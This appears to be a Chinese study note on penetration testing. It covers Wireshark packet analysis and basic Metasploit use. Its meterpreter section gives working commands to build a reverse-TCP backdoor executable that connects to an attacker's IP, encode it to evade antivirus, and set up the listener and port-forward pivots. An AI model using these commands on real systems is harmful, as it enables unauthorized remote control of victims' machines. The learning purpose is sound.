渗透测试
1.wireshark
1.1 抓包分析
1.TCP flags标志(wireshark抓包tcp协议flags)
FIN:结束,结束会话
SYN:同步,开始会话请求
RST:复位,中断一个连接
a.服务端口未打开;
b.交互过程中崩溃;
c.收到的tcp报文不在已建立的连接列表范围内;
d.响应超时或重发次数超过限制;
e.快速释放连接的方式
PUSH:推送,数据包立即发送,不等待缓冲区装满(命令响应)
ACK:应答
URG:紧急
ECE:拥塞提醒回应
CWR:拥塞窗口减少
2.三次握手:
SYN---SYN/ACK---ACK
3.四次握手
ACK/FIN---ACK---ACK/FIN---ACK
4.session和cookie机制
session:服务端保存与客户端连接的维护资源
cookie:客户端保存session-id,(cookie被禁用,URL重写和表单隐藏字段)
1.2 网络流量性能监控
1.过滤条件为空,显示所有数据流。图形分析最大、最小值可能的问题点,更加直观
2.过滤报文http和icmp,模拟场景为icmp不连续疑似问题存在
3.IO Graphs有六个可用函数:SUM, MIN, AVG, MAX, COUNT, LOAD(将Y轴设置为“Advanced”,让Caculation域可见)
1.3 远端抓包
远端电脑需要安装winpcap驱动,并运行rpcapd -h命令启动远端服务,端口号2002(netstat可能查询不到),然后在interface中添加远端接口
1.4 过滤
1.过滤种类:
显示过滤
抓包过滤
Capture -> Capture Filters
2.数据包类型
Frame: 物理层的数据帧概况
Ethernet II: 数据链路层以太网帧头部信息
......
本文参考:
wirshark教程:
http://blog.csdn.net/robertsong2004/article/details/42803773
http://www.cnblogs.com/TankXiao/archive/2012/10/10/2711777.html
远端抓包:
http://world77.blog.51cto.com/414605/760724
wireshark io graph:
http://blog.jobbole.com/70929/
2.metasploit
1.渗透测试
metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。
前期交互阶段:与客户讨论并确定渗透测试的范围和目标
情报搜集阶段:采取各种手段搜集被攻击者的有用信息
威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患
漏洞分析阶段:分析漏洞的可行性以及最可行的攻击方法
渗透攻击阶段:对目标进行渗透
后攻击阶段:根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值
书写渗透报告阶段:撰写渗透报告
使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。
语言同时也是自身的元语言的能力称之为反射
2.metasploit基本用法
banner:查看版本信息
db_driver:metasploit测试前,需要连接数据库(有的版本自动连接)db_connect
search:查找相关模块shellcode(search name:**)
use:使用模块back退出
show options:查看模块参数设置
set:设置参数信息或加载PAYLOAD(setg设置后保存)
exploit:渗透攻击(run别名)
check:测试target(目标操作系统)设置是否正确
edit:编辑当前模块
irb:ruby脚本命令行模式
jobs:查看控制台上的任务
3.metasploit攻击方式分类
635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)
溢出攻击:主动溢出和被动溢出(主动攻击获取权限和监听获取权限)
4.meterpreter模块
msfpayload制作后门程序,在远端电脑运行,使用msfencode制作免杀
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe
本机msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 444
show options
run/exploit 攻击并连接远端后门,进入meterpreter
基本隧道代理功能
portfwd -h (portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听)
pivot
二级代理/三级代理
...
5.metasploit二次开发
metasploit所有模块使用ruby编写,msfcli用户接口程序,2015.6.8已被官方团队移除,但仍然可以使用
metasploit所有模块继承自msf::Module,模块写好后,重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到
6.系统DEP保护
系统内存溢出漏洞,根因在于系统代码段和数据段没有明确的划分。DEP保护,阻止数据页执行shellcode代码
计算机->系统属性->高级->性能->数据执行保护(windows软件DEP、最下角显示CPU硬件是否支持DEP)
DEP保护分为:软件DEP即SafeSEH(编译后生成合法的函数地址加以保护,以区分异常数据页函数),硬件DEP(标记NX不可执行区域)
SafeSEH和SEH(结构异常处理)不同,SEH需要构建SEH链表指针,以线程为单位。汇编中注册异常回调函数如下:
(FS寄存器,存放线程TEB数据)
VS开发中,DEP保护链接默认开启
本文参考:
metasploit教程:
http://pan.baidu.com/s/1kT3RuL5
相关论坛:
http://bbs.pediy.com(看雪论坛)
http://www.wooyun.org(乌云)
http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html
http://bobao.360.cn/news/detail/1132.html 相关资源整理
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站(介绍meterpreter)
https://www.91ri.org/tag/metasploit
http://www.docin.com/p-499012506.html
http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html(DEP)
http://www.hx95.com/Article/Ddos/201501/85101.html (meterpreter)